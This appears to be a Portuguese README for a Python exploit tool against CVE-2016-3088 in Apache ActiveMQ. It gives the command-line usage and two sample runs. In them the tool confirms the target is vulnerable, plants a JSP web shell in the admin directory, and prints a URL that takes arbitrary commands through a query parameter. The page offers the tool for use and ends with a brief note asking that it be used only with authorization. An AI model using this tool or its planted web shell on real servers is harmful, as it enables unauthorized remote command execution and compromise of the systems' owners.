
Um script de exploit baseado em Python para CVE-2016-3088
Um script de exploit baseado em Python para CVE-2016-3088.
Este é meu primeiro script, então pode haver algo que não se encaixa bem.
Mas parece funcionar corretamente quando testei.
Este script pode eliminar a necessidade de capturar pacotes durante a penetração do CVE-2016-3088,
para que possamos escrever e mover o arquivo diretamente.
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
o parâmetro --script é opcional, ele usará o payload embutido se você executar o programa sem ele,
o payload apenas permite executar alguns comandos na url.
Mas você pode inserir outros scripts para alcançar seu objetivo.
Basta baixar o arquivo .py.
E requer alguns módulos.
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
Por favor, use esta ferramenta com cuidado e apenas quando autorizado!